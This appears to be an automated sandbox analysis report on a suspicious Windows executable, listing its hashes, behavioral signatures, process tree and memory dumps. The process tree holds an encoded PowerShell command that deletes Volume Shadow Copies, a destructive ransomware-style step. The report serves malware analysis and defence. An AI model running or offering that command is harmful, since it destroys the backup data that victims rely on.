Analysis

  • max time kernel
    146s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:54

General

  • Target

    db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

  • Size

    164KB

  • MD5

    9a2888ddc389ecde165446d6e3c27f80

  • SHA1

    bf77c02c5a58b5efb29db4191f7e38853dcc3c90

  • SHA256

    db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b

  • SHA512

    9473b40f0b50d3960395e59ca23b8809cb982185f684989d1641c9193c8d2325d2d0843e66421bfdedac26e850bb3d4a9abae06741f7dfb11cf402abcfbdf3b7

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
    "C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:760
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1480
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:604

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/740-54-0x0000000075321000-0x0000000075323000-memory.dmp
      Filesize

      8KB

    • memory/740-56-0x00000000000E0000-0x00000000000EA000-memory.dmp
      Filesize

      40KB

    • memory/740-57-0x00000000001F0000-0x00000000001F1000-memory.dmp
      Filesize

      4KB

    • memory/740-58-0x0000000000200000-0x0000000000201000-memory.dmp
      Filesize

      4KB

    • memory/740-59-0x0000000000210000-0x0000000000211000-memory.dmp
      Filesize

      4KB

    • memory/740-55-0x0000000000C20000-0x0000000000CE9000-memory.dmp
      Filesize

      804KB

    • memory/740-61-0x0000000000EB0000-0x0000000000FDD000-memory.dmp
      Filesize

      1.2MB

    • memory/740-62-0x0000000000290000-0x00000000002AF000-memory.dmp
      Filesize

      124KB

    • memory/740-63-0x00000000026A0000-0x00000000027A9000-memory.dmp
      Filesize

      1.0MB

    • memory/740-64-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

    • memory/760-65-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmp
      Filesize

      8KB

    • memory/760-66-0x000007FEF30A0000-0x000007FEF3BFD000-memory.dmp
      Filesize

      11.4MB

    • memory/760-68-0x00000000028F2000-0x00000000028F4000-memory.dmp
      Filesize

      8KB

    • memory/760-67-0x00000000028F0000-0x00000000028F2000-memory.dmp
      Filesize

      8KB

    • memory/760-69-0x00000000028F4000-0x00000000028F7000-memory.dmp
      Filesize

      12KB

    • memory/760-70-0x000000001B720000-0x000000001BA1F000-memory.dmp
      Filesize

      3.0MB

    • memory/760-71-0x00000000028FB000-0x000000000291A000-memory.dmp
      Filesize

      124KB